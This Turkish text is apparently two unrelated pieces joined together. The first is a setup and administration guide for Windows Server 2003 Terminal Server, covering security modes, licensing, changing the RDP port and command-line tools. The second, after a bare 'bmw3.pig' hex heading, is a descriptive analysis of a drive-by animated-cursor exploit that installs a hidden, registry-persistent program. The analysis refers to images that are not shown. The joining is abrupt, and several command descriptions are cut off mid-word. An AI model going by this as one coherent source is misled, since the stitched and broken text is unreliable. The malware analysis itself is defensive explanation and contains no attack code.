b) : Application Mode : Konunun girisinde bahsettigimiz uygulama çalistirma ve sunucu üzerinde islem yapmak için kullanilan moddur.Uzaktan baglanabilme yetkisine sahip tüm kullanicilar sunucuya uzaktan login olabilir ve hepsi ayni anda birbirinden bagimsiz uygulama çalistirarak islemlerini gerçeklestirebilir.Serverin islemci ve ram gücü bu servisin etkin kullanilmasi açisindan önemli etkenlerdendir.Bu yüzden Terminal Serverlar güçlü yapilandirilmis ve eger mümkünse sadece bu servisin kullanimina tahsis edilmis makinalar olmasi etkin kullanimi açisindan yararlidir.Application Mode da kurulum için Server 2003 sistemininin en az Enterprise Edition olmasi gerekmektedir.Enterprise’in destekledigi 8 islemci ve 32gb Bellek özelligiyle bu servisin kullanilmasinda idealdir.
Application Mode Kurulumu : Program ekle/ Kaldir menüsünden Windows Bileseni ekle kaldiri seçerek “Terminal Server” i ve “Terminal Server Licencing” i seçerek ileriyi tiklayin. 2 adet seçenek geliyor önümüze..
Full Security ve Relaxed Security.
Full Security (Tam Güvenlik) : Bu modda Windows 2000 ve 2003 sistemleri izinleri kullanicilara uygulanir.Kullanicilar sistem dosyalarina,regedite,yapilandirma ayarlarina erisemezler ve güvenlik saglanmis olur.Güvenlik tanimlayicisi 2000 ve 2003 ailesinin standart ayarlarinin getirdigi güvenlik ayarlarini kullanir ve art niyetli / bilgisiz kullanicilarin hataya ve zarara sebebiyet vermelerine mani olur.
Relaxed Security (Gevsek Güvenlik) : Bu ayarin güvenlik tanimliyicilari Windows NT ve Terminal Server Editionin izinlerini kullanicilara uygular.Art niyetli kullanicilarin suistimaline açiktir.Kullanicilar sistem dosyalarina,kayit defterine,sistem yapilandirmalarina erisebilir ve üzerinde degisiklik yapabilirler.Ayni ada sahip bir baska dosyayi server üzerine ekleyerek sistemin ve kullanicilarin zarar görmesini saglayan bir art niyetli kisi bu erisimleri ancak “gevsek güvenlik” ayarlari seçilirse yapabilir.
Bu ayarlarimizi seçip ileri dedigimizde önümüze kullanilacak olan “Lisans Serveri” seçenegi gelir.Eger daha önceden bu servisi kullandiysak ve bir Lisans Servera sahipsek ilk kisimdaki alandan serverin ismini belirterek bu kismi geçebiliriz.Fakat servisi defa ilk kuruyorsak en alttaki seçenegi seçmeliyiz.”120 gün içerisinde lisans serverini belirleyecegim.”
Terminal Server ilk kurulumda Lisans Serverin belirlenip dagitilmasi için 120 gün zaman tanir.Bu süreç Servera yapilan ilk baglanti ile baslar ve 120 gün sonunda biter.Bu süreç içerisinde clientlardan yapilan lisanssiz baglantilar kabul edilir ve Lisans serverina baglanip dogrulugu arastirilmaz.120 günün sonunda yetsikiz kullanim süresi dolar ve istemcilerden gelen baglanti kabul edilmez.120 gün içerisinde lisans serveri kurulup clientlara dagitilip böyle bir baglanti kurulursa 120 gün beklenmeden Terminal Server Lisansli duruma geçer ve Lisans dagitimini yaparak onayli baglantilar(sifreli) saglanir.
Bir diger adimda Lisanslama yapilandirmasi yapilir.Burada önümüz 2 seçenek çikar.Bunlar ;
Per Device licencing mode (Aygit basina lisanslama)
Per User licencing mode (Kullanici basina lisanslama)
Aygit Basina Lisanslama : Her istemciye veya aygita Terminal Servera erisim hakki verilir.
Kullanici basina lisanslama : Kullaniciya sinirsiz sayida aygittan Terminal Servera baglanma hakki verilir.
Her aygita bir CAL ( Client Access Licencing-istemci erisim lisansi) gerekmez.Kullanici bazli yapilandirmak daha dogrudur.
Bir sonraki ve son adimda Lisans Server olarak tanimlanacak bilgisayarin belirlenmesi istenir.Eger serveriniz bir domaine dahil veya DC ise alttaki seçenegi seçerek kuruluma baslayabilirsiniz.
Kurulum bittikten sonra sistemi yeniden baslatmaniz istenecektir.
Administrative Tools altindan “Terminal Services Configuration” i açin.
Connection kismindan o anda mevcut baglanti ayarlarini ve kullanıcı haklarını yönetebilirsiniz.Kullanilan RDP Protokolu xp ve 2003 arasinda 128 bitlik bir veri sifrelemesini saglar ve güvenlidir.Server Setting kismindada performansa ve yapilandirmaniza dair ayarlari görebilirsiniz.Bunlar kisaca ;
Session Directory : Sisteme loginleri kontrol eder.Logoff olmus fakat sistemden çikmamis bir kullanici tekrar baglanmayi denerse (ortamda NLB varsa) ikinci server baglanti istegine karsilik vererek yeni bir oturum açacaktir.Fakat ilk serverdaki oturum devam ettiginden sistem kaynaklari gereksiz yere tüketilecektir.Bunun süre sinirlamasi kesinlikle yapilmalidir.
Restrict each user to one session : Her kullanicinin ayni anda sadece bir erisim hakkina sahip olmasidir.Bir üstteki anlatilanlar düsünülerek yapilandirilmalidir.
Delete temporary folders on exit : kullanicilarin geçici dosyalarinin oturum sonunda silinmesini saglar.
Connections kisminda,sagda bulunan baglantilar üzerindede degisiklik yapabilirsiniz.Bunun için Connections kisminda sağ tarafta sag tiklayarak özellikleri seçin ve ayarlarinizi yapin.Bir kaç özellik ;
- Kullanicilarin izinlerinin düzenlenmesi,
- Kullanicilarin erisimlerindeki kullanicaklari kaynaklari belirleme ( Driver mapping,Printing veya printer port yönlendirme)
- Kullanici baglantisinin süresiz yasaklanmasi
- Baglanti sifreleme sekli (High-128 bit,xp ve 2003 içindir.RDP 5.1 ve 5.2—-Client Compatible ise RDP 4 ve 5 clientlarin baglanmasini saglar.Sifreleme daha alt düzeydedir)
Yine Administrative Tools altinda bulunan “Terminal Services Manager” açin.
Bu alanda mevcut baglantilari görebilir ve yönetebilirsiniz.Kullanicilarin çalistirdiklari uygulamalar,bagli kaldiklari süre,bos bekleyen süre,uyari mesaji gönderme,clienta baglanma gibi özellikleri vardir.Bunlarin yaninda eger agda birden fazla Terminal Server varsa en sik kullanilanlari,tüm serverlari ve durumlarini izleyebilirsiniz.
Sistem yöneticilerinin islerini kolaylastirmada büyük öneme sahip Terminal Serverlara,admin yetkisine sahip bir kullanici uzaktan eriserek birden fazla Terminal Serveri veya farkli yapilandirilmis (SQL,IIS) Serverlari tek bir ekrandan rahatlikla yönetebilir.Zaman,maliyet ve is yükünün azaltilmasi açisindan büyük öneme sahiptir.
MMC üzerinden Yönetim :
Mevcut degilse snap-in ekleyerek sürekli kullanim için isinizi kolaylastirabilirsiniz.
Computer Configuration /Administrative Templates /Windows Components /Terminal Services
Bu kisimda Serverin performansli çalismasi için yapilmasi gereken bazi ayarlamalara göz atabiliriz.Bunlar öncelikle “Session” klasorundeki ayarlardir.Aktif,bosta olan baglantilari düzenler.Baglantilara zaman siniri belirlenebilir.Sifreleme klasorunde client/server baglantisi sifreleme düzeyi ayarlanabilir.Ana dizindeki ayarlamalarda beklentiniz ölçüsünde optimize edilebilir.
Default Portu Degistirme : Default olarak Terminal Server 3389 dur.Bunu degistirerek baglanti saglanmasi güvenligi arttirmada arti bir yarardir.
Kayit defterinden ;
HKLM/System/CurrentControlSet/Control/Termial Server/Wds/Rdpwd/Tds/TCP/PortNumber kismindan degistirebilirsiniz.Degistirdikten sonra her baglanti kuracaginizda baglanti penceresinde Computer kisminin yanina baglanti portunuda yazmalisiniz.Mesela Serverin adi TServer1
“TServer1:3333″ <-- degistirilen port
Komut satırından Yönetim :
query user: Serverda oturum açan kullanıcı hakkında bilgi verir
query termserver:Networkte bulunan Terminal Serverların listesini verir
reset session: Oturumun kapatılmasını sağlar
msg:Kullanıcıya mesaj gönderir
mstsc:RDP yi başlatır
shadow: Kullanıcının oturumunu uzaktan kontrol etmeyi sağlar
tscon: başka bir oturuma bağlanılmasını sağlar
tsdiscon
turumun bağlantısını keser
tskill:çalışan bir processi sonlandırır
tsshutdn
istem yöneticisi bu komutla Terminal Serverı uzaktan kapatıp açabilir.
Istemci tarafindan Baglanilmasi : Istemci tarafindaki kullanici uzak masa üstü programini (baslat/tüm programlar/accessories/communications) çalistirarak servera baglanabilir.veya çalıştır kısmına “mstsc” yazarak bu uygulamaya erişebilirler.Bu baglantinin gerçeklesmesi için kullaniciya atanmis Remote baglanabilirlik yetkisi olmalidir.Açilan pencereye kullanici adi/sifre varsa domain yazilarak baglanti gerçeklestirilir.Burada bazi ayarlamalar yapilabilir(Admin izin verdiyse).
Bunlar ;
Display : Ekran çözünürlügü ve renk derinligi
Local Resources : Terminal serverdan ses aktariminin saglanip saglanmamasi,kendi harddisikinize,yaziciniza Terminal Server üzerinde görünüp erismeniz
Programs : Baglanildigi anda çalistirilmasi istenen program
Bir kaç Püf Noktasi :
* Kurulumda Güvenlik endiseleriniz varsa Full Security seçenegini Seçin.
* MMC üzerinden Idle ve max logon sürelerini belirleyiniz
* Session Directoryi aktif yapiniz
* Terminal Serveri NTFS formatli diske kurunuz
* TS kapatilacagi zaman “kapat” yerine Tsshutdn komutunu kullanın
* Lisans Serverın 120 günlük süresini takip edin
* Kullanıcı izinlerini gözden geçirin
* Ses,Printer,Driver mapping özelliklerini kullanılmayacaksa kısıtlayın.
Hex / bmw3.pig/
Yukarıda bmw3.pig isimli dosyanın içeriği gözükmektedir. Bu “Animated Cursor” tipi dosyalarına özgü olan bir açıktan faydalanarak sisteme zararlı program yüklemeye çalışan bir dosyadır.
Web sayfalarını gezerken ansızın açılan pencereler, sistem kilitlenmeleri kötü bir haberin başlangıcı olabilir. Yeni bir güvenlik zaafı ortaya çıktığında bu istismarın tehlike boyutunu arttıracak çeşitli yöntemlerde ortaya çıkmaktadır. Bilinen yöntemleri takip etmek kolay olabilir.
Fakat Antivirus, Firewall gibi yazılımları atlatacak yöntemlerin ortaya çıkması internet kullanıcılarını zor durumda bırakması içten bile değildir.
Adım adım bir zararlı uygulamanın sisteme erişmesini inceleyelim:
* WEB Sayfaları arasındaki gezintiler esnasında istemediğiniz bir bağlantının meydana getirdikleri sisteminizi sizin kontrolü haricinde başka kesimlere de kontrol etme imkanı sağlayabilir. Yukarıdaki resimde görüldüğü gibi bağlantı sağlanan sayfa isteğiniz dışında bazı işlemleri gerçekleştirmeye zemin hazırlar. Burada yer alan resimler sniffer(paket koklayıcı) programı ile elde edilmiştir.
* Arka planda calışan sayfa işletim sistemi kontrolünü gerçekleştirmektedir. Kontrol işlemi sonucu istenilen işletim sistemini kullanıyorsanız tehlikeli bir kapının yanına yaklaştınız demektir.
* Resimde görüldüğü gibi işletim sisteminiz güvenlik zaafı sonucunda uzaktan sisteminize istenilen uygulama aktarılıyor.
* Zararlı program sisteme yüklenmeye başlamıştır. Sniffer ile tespit edilen paket kontrol edildiğinde bunun bir .exe uygulaması olduğu görülür(Başlık: MZP).
Sisteme aktarılan bu uygulama derinlemesine incelendiğinde;
Registry ayarlarında kullanıcının bilgisi dahilinde olmayan değişiklikler yapmaktadır.
* Bir çok zararlı programların temel huyu registry kayıtlarında kendine göre oynama yapmaktır. Böylece sistemin açılışında otomatik aktif olur ve internet Explorer gibi browserlarda kontrolü ele alır.
* Kendini gizlemek çeşitli yöntemler kullanır. Bunun için güvenilir bir imaj sağlamış olan herhangi bir dizine kendisini kopyalar (Örn: C:\Program Files\Microsoft Shared\MSINFO”).
* Zararlı uygulama kendini dizine kopyalamıştır. Fakat görünürde işletim sistemine ait uygulamalardan başka bir uygulama görünmemektedir.
* Bilindik bir komut olan “dir” komutuyla dizini incelediğimizde yine işletim sistemine ait dosyalar görünüyor.
* dir /ah komutuyla gizli dosyaları rahatlıkla görüyoruz. “NewInfo.dll” ve “system.2dt” isimli dosyalar sistemi takip etmek için kullanıcıdan habersiz bir güvenlik zaafından yararlanılarak sisteme yüklenmiştir.
Internet kullanıcılarının kişisel bilgilerini ele geçirmek için kullanıcılar tarafından sıklıkla ziyaret edilen Web sayfaları birer hedef haline dönüşmektedir. Bu kişi/kişiler Web sayfalarında görünür bir değişiklik yapmaktansa gizli kodlar ekleyerek kullanıcıların kişisel bilgilerini ele geçirme yolunu tercih ederler.